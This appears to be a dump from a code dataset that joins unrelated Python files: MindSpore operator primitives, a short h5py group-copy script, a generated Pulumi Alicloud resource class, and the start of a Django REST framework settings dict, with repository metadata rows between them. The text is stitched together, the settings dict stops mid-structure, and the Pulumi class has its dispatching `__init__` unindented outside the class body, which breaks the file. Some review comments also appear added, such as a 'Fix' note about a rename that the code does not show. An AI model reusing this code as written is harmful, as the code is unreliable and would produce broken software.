class UpdateState(Primitive):
    """
    UpdateState is used for updating the side-effect state.
    Inputs:
        - **value** (State) - the state value to be updated.
        - **expr** (Expression) - the expression to evaluate before the state changes.
    Outputs:
        State, the updated state value.
    """
    @prim_attr_register
    def __init__(self):
        """Initialize UpdateState."""
    def __call__(self, state, expr):
        # At run time the expression has already been evaluated; hand the state
        # token back so downstream operations can depend on it.
        return state
class CheckBprop(PrimitiveWithInfer):
    """
    Verifies that a bprop's outputs match the corresponding forward inputs.
    Each element of `input_x` (the gradients produced by the bprop) is compared
    against the element of `input_y` (the forward inputs) at the same position;
    both the shape and the data type must agree.
    Inputs:
        - **input_x** (tuple[Tensor]) - The outputs of the bprop to be checked.
        - **input_y** (tuple[Tensor]) - The inputs of the bprop to check against.
    Outputs:
        (tuple[Tensor]), `input_x` unchanged, provided every element matches.
    Raises:
        TypeError: If `input_x` or `input_y` is not a Tensor.
    Examples:
        >>> input_x = (Tensor(np.array([[2, 2], [2, 2]]), mindspore.float32),)
        >>> input_y = (Tensor(np.array([[2, 2], [2, 2]]), mindspore.float32),)
        >>> out = ops.CheckBprop()(input_x, input_y)
    """
    @prim_attr_register
    def __init__(self, prim_to_check=""):
        """Initialize CheckBprop"""
        self.prim_to_check = prim_to_check
    def infer_shape(self, xshapes, yshapes):
        tips = f'Bprop of {self.prim_to_check}'
        validator.check_value_type('grads', xshapes, (tuple,), tips)
        validator.check_value_type('params', yshapes, (tuple,), tips)
        if len(xshapes) < len(yshapes):
            raise ValueError(f"{tips}, the size of output should be {len(yshapes)},"
                             f" but got {len(xshapes)}.")
        # zip yields exactly len(yshapes) pairs here, since len(xshapes) >= len(yshapes).
        for idx, (out_shape, param_shape) in enumerate(zip(xshapes, yshapes)):
            if not out_shape or not param_shape:
                continue
            if out_shape != param_shape:
                raise ValueError(f"{tips}, the shape of {idx}th output should be {param_shape},"
                                 f" but got {out_shape}.")
        return xshapes
    def infer_dtype(self, xdtypes, ydtypes):
        tips = f'Bprop of {self.prim_to_check}'
        validator.check_value_type('grads', xdtypes, (tuple,), tips)
        validator.check_value_type('params', ydtypes, (tuple,), tips)
        if len(xdtypes) < len(ydtypes):
            raise ValueError(f"{tips}, the size of output should be {len(ydtypes)},"
                             f" but got {len(xdtypes)}.")
        for idx, (out_dtype, param_dtype) in enumerate(zip(xdtypes, ydtypes)):
            if isinstance(out_dtype, mstype.anything_type) or isinstance(param_dtype, mstype.anything_type):
                continue
            if isinstance(param_dtype, mstype.function_type):
                # A function-typed forward input expects an env-typed gradient.
                if not isinstance(out_dtype, mstype.env_type_type):
                    raise TypeError(f"{tips}, the dtype of {idx}th output should be {mstype.env_type_type},"
                                    f" but got {out_dtype}.")
                continue
            if out_dtype != param_dtype:
                raise TypeError(f"{tips}, the dtype of {idx}th output should be {param_dtype},"
                                f" but got {out_dtype}.")
        return xdtypes
class ConfusionMatrix(PrimitiveWithInfer):
    r"""
    Calculates the confusion matrix from labels and predictions.
    Args:
        num_classes (int): The num of classes.
        dtype (str): Data type of confusion matrix. Default: 'int32'.
    Inputs:
        - **labels** (Tensor) - real labels, tensor of 1-D. the dtype must be non-negative Integer.
        - **predictions** (Tensor) - the labels from prediction, tensor of 1-D.
          the shape same as `labels` and the dtype must be non-negative Integer.
        - **weights** (Tensor) - tensor of 1-D. the shape same as `predictions`.
    Outputs:
        Tensor, the confusion matrix, with shape (`num_classes`, `num_classes`).
    Raises:
        TypeError: If `num_classes` is not an int.
        TypeError: If `dtype` is not a str.
        TypeError: If `labels`, `predictions` or `weights` is not a Tensor.
    Examples:
        >>> confusion_matrix = ops.ConfusionMatrix(4)
        >>> labels = Tensor([0, 1, 1, 3], mindspore.int32)
        >>> predictions = Tensor([1, 2, 1, 3], mindspore.int32)
        >>> output = confusion_matrix(labels, predictions)
        >>> print(output)
        [[0 1 0 0]
         [0 1 1 0]
         [0 0 0 0]
         [0 0 0 1]]
    """
    @prim_attr_register
    def __init__(self, num_classes, dtype="int32"):
        """Initialize ConfusionMatrix."""
        # NOTE(review): infer_shape reads self.num_classes although it is never
        # assigned here -- presumably @prim_attr_register records constructor
        # arguments as attributes; confirm against the decorator.
        validator.check_value_type("num_classes", num_classes, [int], self.name)
        validator.check_value_type("dtype", dtype, [str], self.name)
    def infer_shape(self, labels, predictions, weights=None):
        """All inputs must be 1-D with equal shape; output is always (num_classes, num_classes)."""
        validator.check('labels dimension', len(labels), '', 1, Rel.EQ, self.name)
        validator.check('labels shape', labels, 'predictions shape', predictions, Rel.EQ, self.name)
        if weights is not None:
            validator.check('labels shape', labels, 'weights shape', weights, Rel.EQ, self.name)
        ret = (self.num_classes, self.num_classes)
        return ret
    def infer_dtype(self, labels, predictions, weights=None):
        """All inputs must be tensors; labels/predictions must share a numeric dtype, which is returned."""
        validator.check_subclass('labels', labels, mstype.tensor, self.name)
        validator.check_subclass('predictions', predictions, mstype.tensor, self.name)
        if weights is not None:
            validator.check_subclass('weights', weights, mstype.tensor, self.name)
        args = {"labels": labels, "predictions": predictions}
        validator.check_tensors_dtypes_same_and_valid(args, (mstype.number_type), self.name)
        return labels
class PopulationCount(PrimitiveWithInfer):
    r"""
    Calculates population count (the number of set bits in each element).
    Inputs:
        - **input** (Tensor) - The data type must be int16 or uint16.
    Outputs:
        Tensor, with the same shape as the input.
    Raises:
        TypeError: If `input` is not a Tensor.
    Supported Platforms:
        ``Ascend``
    Examples:
        >>> population_count = ops.PopulationCount()
        >>> x_input = Tensor([0, 1, 3], mindspore.int16)
        >>> output = population_count(x_input)
        >>> print(output)
        [0 1 2]
    """
    @prim_attr_register
    def __init__(self):
        """Initialize PopulationCount."""
        pass
    def infer_shape(self, x_shape):
        """Element-wise op: the output shape equals the input shape."""
        return x_shape
    def infer_dtype(self, x_dtype):
        """Input must be int16/uint16; the per-element bit counts are returned as uint8."""
        validator.check_tensor_dtype_valid("x", x_dtype, (mstype.int16, mstype.uint16,), self.name)
        return mstype.tensor_type(mstype.uint8)
class Push(PrimitiveWithInfer):
    """
    Pushes the inputs of the corresponding optimizer to parameter server.
    Args:
        optim_type (string): The optimizer type. Default: 'ApplyMomentum'.
        only_shape_indices (list): The indices of input of which only shape
            will be pushed to parameter server. Default: None.
    Inputs:
        - **optim_inputs** (tuple) - The inputs for this kind of optimizer.
        - **optim_input_shapes** (tuple) - The shapes of the inputs.
    Outputs:
        Tensor, the key of the weight which needs to be updated.
    """
    @prim_attr_register
    def __init__(self, optim_type='ApplyMomentum', only_shape_indices=None):
        """Initialize Push"""
        # Parameter-server communication is host-side: pin execution to CPU and
        # mark the primitive as side-effecting so it is not optimized away.
        self.add_prim_attr("primitive_target", "CPU")
        self.add_prim_attr("_side_effect", True)
        self.init_prim_io_names(inputs=['optim_inputs', 'optim_input_shapes'], outputs=['key'])
    def infer_shape(self, inputs, shapes):
        """The returned key is a single value, so the output shape is [1]."""
        return [1]
    def infer_dtype(self, inputs, shapes):
        """The weight key is an unsigned 64-bit integer."""
        return mstype.uint64
class Pull(PrimitiveWithInfer):
    """
    Pulls weight from parameter server.
    Inputs:
        - **key** (Tensor) - The key of the weight.
        - **weight** (Tensor) - The weight to be updated.
    Outputs:
        None.
    """
    @prim_attr_register
    def __init__(self):
        """Initialize Pull"""
        # Parameter-server communication is host-side, so pin execution to CPU.
        self.add_prim_attr("primitive_target", "CPU")
        self.init_prim_io_names(inputs=['key', 'weight'], outputs=['output'])
    def infer_shape(self, key_shape, weight_shape):
        """Placeholder output: a single value, shape [1]."""
        return [1]
    def infer_dtype(self, key_dtype, weight_dtype):
        """Placeholder output dtype is float32 regardless of the input dtypes."""
        return mstype.float32
class PullWeight(PrimitiveWithInfer):
    """
    Pull weight by its names from server.
    Inputs:
        - **weight** (Tensor) - The weight to be pulled.
        - **name** (String) - The full name of the weight.
        - **index** (Int) - The index of the weight.
    Outputs:
        None.
    """
    @prim_attr_register
    def __init__(self):
        """Initialize PullWeight"""
        # Parameter-server communication is host-side, so pin execution to CPU.
        self.add_prim_attr("primitive_target", "CPU")
        self.init_prim_io_names(inputs=['weight', "name", "index"], outputs=['output'])
    def infer_shape(self, weight, name, index):
        """Placeholder output: a single value, shape [1]."""
        return [1]
    def infer_dtype(self, weight, name, index):
        """Placeholder output dtype is float32 regardless of the weight dtype."""
        return mstype.float32
class PushWeight(PrimitiveWithInfer):
    """
    Upload a weight to the parameter server by its name.
    Inputs:
        - **weight** (Tensor) - The weight to be uploaded.
        - **name** (String) - The full name of the weight.
        - **index** (Int) - The index of the weight.
    Outputs:
        None.
    """
    @prim_attr_register
    def __init__(self):
        """Initialize PushWeight"""
        # Parameter-server communication is host-side, so pin execution to CPU.
        self.add_prim_attr("primitive_target", "CPU")
        self.init_prim_io_names(inputs=['weight', "name", "index"], outputs=['output'])
    def infer_shape(self, weight, name, index):
        """Placeholder output: a single value, shape [1]."""
        return [1]
    def infer_dtype(self, weight, name, index):
        """Placeholder output dtype is float32 regardless of the weight dtype."""
        # Fix: the second parameter was named `ps_key` here but `name` in
        # infer_shape, in init_prim_io_names and in sibling PullWeight; the
        # framework invokes these positionally, so the rename is safe.
        return mstype.float32
class identity(Primitive):
    """
    Makes an identity primitive, used for pynative mode.
    Inputs:
        - **x** (Any) - identity input value.
    Outputs:
        The same as input.
    """
    # NOTE: the lowercase class name is intentional (functional-style operator).
    # Side effect will propagated from the first argument to return value.
    side_effect_propagate = 1
    @prim_attr_register
    def __init__(self):
        """Initialize identity."""
        self.add_prim_attr('side_effect_propagate', 1)
    def __call__(self, x):
        # Pynative fast path: return the input unchanged.
        return x
| 36.9375 | 118 | 0.607885 |
0533fa5e6db86490f97a871cdb346354e18376ef | 99 | py | Python | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | 1 | 2020-05-01T04:19:05.000Z | 2020-05-01T04:19:05.000Z | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | 2 | 2017-11-22T18:56:26.000Z | 2017-11-22T19:08:31.000Z | check_se/HDF5_test/copy_H5groups.py | NuGrid/SE-library | fdbeaa10aca93c3183eda9d7a1b7be6028e24f7e | [
"BSD-3-Clause"
] | null | null | null | import h5py
f = h5py.File('M3.00Z0.020.0079001.se.h5')
f.copy('cycle0000079999','cycle0000080000')
| 24.75 | 43 | 0.747475 |
b0625f8b4d4a383791130b994b0a80ebfcbd2fc0 | 21,087 | py | Python | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/eipanycast/anycast_eip_address.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['AnycastEipAddressArgs', 'AnycastEipAddress']
# NOTE: generated by the Pulumi Terraform Bridge (tfgen); keep the codegen
# getter/setter pattern intact so the file stays regenerable.
@pulumi.input_type
class AnycastEipAddressArgs:
    def __init__(__self__, *,
                 service_location: pulumi.Input[str],
                 anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
                 bandwidth: Optional[pulumi.Input[int]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 internet_charge_type: Optional[pulumi.Input[str]] = None,
                 payment_type: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing an AnycastEipAddress resource.
        :param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        :param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
        :param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        :param pulumi.Input[str] description: Anycast EIP instance description.
        :param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        :param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        """
        pulumi.set(__self__, "service_location", service_location)
        # Optional arguments are stored only when explicitly supplied, so an
        # unset field stays distinguishable from one set to None.
        if anycast_eip_address_name is not None:
            pulumi.set(__self__, "anycast_eip_address_name", anycast_eip_address_name)
        if bandwidth is not None:
            pulumi.set(__self__, "bandwidth", bandwidth)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if internet_charge_type is not None:
            pulumi.set(__self__, "internet_charge_type", internet_charge_type)
        if payment_type is not None:
            pulumi.set(__self__, "payment_type", payment_type)
    @property
    @pulumi.getter(name="serviceLocation")
    def service_location(self) -> pulumi.Input[str]:
        """
        Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        """
        return pulumi.get(self, "service_location")
    @service_location.setter
    def service_location(self, value: pulumi.Input[str]):
        pulumi.set(self, "service_location", value)
    @property
    @pulumi.getter(name="anycastEipAddressName")
    def anycast_eip_address_name(self) -> Optional[pulumi.Input[str]]:
        """
        Anycast EIP instance name.
        """
        return pulumi.get(self, "anycast_eip_address_name")
    @anycast_eip_address_name.setter
    def anycast_eip_address_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "anycast_eip_address_name", value)
    @property
    @pulumi.getter
    def bandwidth(self) -> Optional[pulumi.Input[int]]:
        """
        The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        """
        return pulumi.get(self, "bandwidth")
    @bandwidth.setter
    def bandwidth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "bandwidth", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Anycast EIP instance description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="internetChargeType")
    def internet_charge_type(self) -> Optional[pulumi.Input[str]]:
        """
        The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        """
        return pulumi.get(self, "internet_charge_type")
    @internet_charge_type.setter
    def internet_charge_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "internet_charge_type", value)
    @property
    @pulumi.getter(name="paymentType")
    def payment_type(self) -> Optional[pulumi.Input[str]]:
        """
        The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        """
        return pulumi.get(self, "payment_type")
    @payment_type.setter
    def payment_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "payment_type", value)
# NOTE: generated by the Pulumi Terraform Bridge (tfgen); keep the codegen
# getter/setter pattern intact so the file stays regenerable.
@pulumi.input_type
class _AnycastEipAddressState:
    def __init__(__self__, *,
                 anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
                 bandwidth: Optional[pulumi.Input[int]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 internet_charge_type: Optional[pulumi.Input[str]] = None,
                 payment_type: Optional[pulumi.Input[str]] = None,
                 service_location: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering AnycastEipAddress resources.
        :param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
        :param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        :param pulumi.Input[str] description: Anycast EIP instance description.
        :param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        :param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        :param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        :param pulumi.Input[str] status: The IP status.
        """
        # Every field is optional for state lookups; store only what was given.
        if anycast_eip_address_name is not None:
            pulumi.set(__self__, "anycast_eip_address_name", anycast_eip_address_name)
        if bandwidth is not None:
            pulumi.set(__self__, "bandwidth", bandwidth)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if internet_charge_type is not None:
            pulumi.set(__self__, "internet_charge_type", internet_charge_type)
        if payment_type is not None:
            pulumi.set(__self__, "payment_type", payment_type)
        if service_location is not None:
            pulumi.set(__self__, "service_location", service_location)
        if status is not None:
            pulumi.set(__self__, "status", status)
    @property
    @pulumi.getter(name="anycastEipAddressName")
    def anycast_eip_address_name(self) -> Optional[pulumi.Input[str]]:
        """
        Anycast EIP instance name.
        """
        return pulumi.get(self, "anycast_eip_address_name")
    @anycast_eip_address_name.setter
    def anycast_eip_address_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "anycast_eip_address_name", value)
    @property
    @pulumi.getter
    def bandwidth(self) -> Optional[pulumi.Input[int]]:
        """
        The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        """
        return pulumi.get(self, "bandwidth")
    @bandwidth.setter
    def bandwidth(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "bandwidth", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Anycast EIP instance description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="internetChargeType")
    def internet_charge_type(self) -> Optional[pulumi.Input[str]]:
        """
        The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        """
        return pulumi.get(self, "internet_charge_type")
    @internet_charge_type.setter
    def internet_charge_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "internet_charge_type", value)
    @property
    @pulumi.getter(name="paymentType")
    def payment_type(self) -> Optional[pulumi.Input[str]]:
        """
        The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        """
        return pulumi.get(self, "payment_type")
    @payment_type.setter
    def payment_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "payment_type", value)
    @property
    @pulumi.getter(name="serviceLocation")
    def service_location(self) -> Optional[pulumi.Input[str]]:
        """
        Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        """
        return pulumi.get(self, "service_location")
    @service_location.setter
    def service_location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_location", value)
    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        The IP status.
        """
        return pulumi.get(self, "status")
    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
class AnycastEipAddress(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
                 bandwidth: Optional[pulumi.Input[int]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 internet_charge_type: Optional[pulumi.Input[str]] = None,
                 payment_type: Optional[pulumi.Input[str]] = None,
                 service_location: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Eipanycast Anycast Eip Address resource.
        For information about Eipanycast Anycast Eip Address and how to use it, see [What is Anycast Eip Address](https://help.aliyun.com/document_detail/169284.html).
        > **NOTE:** Available in v1.113.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.eipanycast.AnycastEipAddress("example", service_location="international")
        ```
        ## Import
        Eipanycast Anycast Eip Address can be imported using the id, e.g.
        ```sh
         $ pulumi import alicloud:eipanycast/anycastEipAddress:AnycastEipAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
        :param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        :param pulumi.Input[str] description: Anycast EIP instance description.
        :param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        :param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        :param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        """
        # Typing-only overload: body is intentionally Ellipsis; the shared
        # implementation lives in _internal_init.
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: AnycastEipAddressArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Eipanycast Anycast Eip Address resource.
        For information about Eipanycast Anycast Eip Address and how to use it, see [What is Anycast Eip Address](https://help.aliyun.com/document_detail/169284.html).
        > **NOTE:** Available in v1.113.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.eipanycast.AnycastEipAddress("example", service_location="international")
        ```
        ## Import
        Eipanycast Anycast Eip Address can be imported using the id, e.g.
        ```sh
         $ pulumi import alicloud:eipanycast/anycastEipAddress:AnycastEipAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param AnycastEipAddressArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        # Typing-only overload: body is intentionally Ellipsis; the shared
        # implementation lives in _internal_init.
        ...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AnycastEipAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
                 bandwidth: Optional[pulumi.Input[int]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 internet_charge_type: Optional[pulumi.Input[str]] = None,
                 payment_type: Optional[pulumi.Input[str]] = None,
                 service_location: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Shared implementation behind both __init__ overloads: validate the
        # resource options, pack the inputs into an AnycastEipAddressArgs bag
        # and register the resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No provider id supplied, so this is a create (not an adopt of an
            # existing resource); __props__ may only accompany a valid opts.id.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            # __new__ deliberately bypasses AnycastEipAddressArgs.__init__;
            # the fields are written into __dict__ directly below.
            __props__ = AnycastEipAddressArgs.__new__(AnycastEipAddressArgs)
            __props__.__dict__["anycast_eip_address_name"] = anycast_eip_address_name
            __props__.__dict__["bandwidth"] = bandwidth
            __props__.__dict__["description"] = description
            __props__.__dict__["internet_charge_type"] = internet_charge_type
            __props__.__dict__["payment_type"] = payment_type
            # service_location is the only required input here, unless the
            # resource is being adopted via an explicit URN.
            if service_location is None and not opts.urn:
                raise TypeError("Missing required property 'service_location'")
            __props__.__dict__["service_location"] = service_location
            # status is output-only; the engine resolves it after creation.
            __props__.__dict__["status"] = None
        super(AnycastEipAddress, __self__).__init__(
            'alicloud:eipanycast/anycastEipAddress:AnycastEipAddress',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            anycast_eip_address_name: Optional[pulumi.Input[str]] = None,
            bandwidth: Optional[pulumi.Input[int]] = None,
            description: Optional[pulumi.Input[str]] = None,
            internet_charge_type: Optional[pulumi.Input[str]] = None,
            payment_type: Optional[pulumi.Input[str]] = None,
            service_location: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None) -> 'AnycastEipAddress':
        """
        Get an existing AnycastEipAddress resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] anycast_eip_address_name: Anycast EIP instance name.
        :param pulumi.Input[int] bandwidth: The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
        :param pulumi.Input[str] description: Anycast EIP instance description.
        :param pulumi.Input[str] internet_charge_type: The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
        :param pulumi.Input[str] payment_type: The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
        :param pulumi.Input[str] service_location: Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
        :param pulumi.Input[str] status: The IP status.
        """
        # Merging an id into the options makes the base class perform a
        # lookup (read) of an existing resource instead of creating one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # __new__ bypasses the state object's __init__; fields are written
        # into __dict__ directly, mirroring _internal_init.
        __props__ = _AnycastEipAddressState.__new__(_AnycastEipAddressState)
        __props__.__dict__["anycast_eip_address_name"] = anycast_eip_address_name
        __props__.__dict__["bandwidth"] = bandwidth
        __props__.__dict__["description"] = description
        __props__.__dict__["internet_charge_type"] = internet_charge_type
        __props__.__dict__["payment_type"] = payment_type
        __props__.__dict__["service_location"] = service_location
        __props__.__dict__["status"] = status
        return AnycastEipAddress(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="anycastEipAddressName")
def anycast_eip_address_name(self) -> pulumi.Output[Optional[str]]:
"""
Anycast EIP instance name.
"""
return pulumi.get(self, "anycast_eip_address_name")
@property
@pulumi.getter
def bandwidth(self) -> pulumi.Output[int]:
"""
The peak bandwidth of the Anycast EIP instance, in Mbps. It can not be changed when the internet_charge_type is `PayByBandwidth` and the default value is 200.
"""
return pulumi.get(self, "bandwidth")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Anycast EIP instance description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="internetChargeType")
def internet_charge_type(self) -> pulumi.Output[Optional[str]]:
"""
The billing method of Anycast EIP instance. `PayByBandwidth`: refers to the method of billing based on traffic. Valid value: `PayByBandwidth`.
"""
return pulumi.get(self, "internet_charge_type")
@property
@pulumi.getter(name="paymentType")
def payment_type(self) -> pulumi.Output[Optional[str]]:
"""
The payment model of Anycast EIP instance. `PayAsYouGo`: Refers to the post-paid mode. Valid value: `PayAsYouGo`. Default value is `PayAsYouGo`.
"""
return pulumi.get(self, "payment_type")
@property
@pulumi.getter(name="serviceLocation")
def service_location(self) -> pulumi.Output[str]:
"""
Anycast EIP instance access area. `international`: Refers to areas outside of Mainland China.
"""
return pulumi.get(self, "service_location")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The IP status.
"""
return pulumi.get(self, "status")
| 46.041485 | 202 | 0.668706 |
523412ab9a8fc66f5f353881c3de3c84ba2486b5 | 901 | py | Python | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | null | null | null | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | 2 | 2021-02-02T23:09:32.000Z | 2021-06-10T23:43:39.000Z | lego/settings/rest_framework.py | HoboKristian/lego | 2729dcef770ad1105f53e087c07ece3f9e9dbc67 | [
"MIT"
] | null | null | null | REST_FRAMEWORK = {
"DEFAULT_AUTHENTICATION_CLASSES": [
"lego.apps.oauth.authentication.Authentication",
"rest_framework.authentication.SessionAuthentication",
"lego.apps.jwt.authentication.Authentication",
],
"DEFAULT_RENDERER_CLASSES": ["lego.utils.renderers.JSONRenderer"],
"DEFAULT_PARSER_CLASSES": [
"djangorestframework_camel_case.parser.CamelCaseJSONParser"
],
"DEFAULT_PERMISSION_CLASSES": [
"lego.apps.permissions.api.permissions.LegoPermissions"
],
"DEFAULT_FILTER_BACKENDS": [
"django_filters.rest_framework.DjangoFilterBackend",
"lego.apps.permissions.api.filters.LegoPermissionFilter",
],
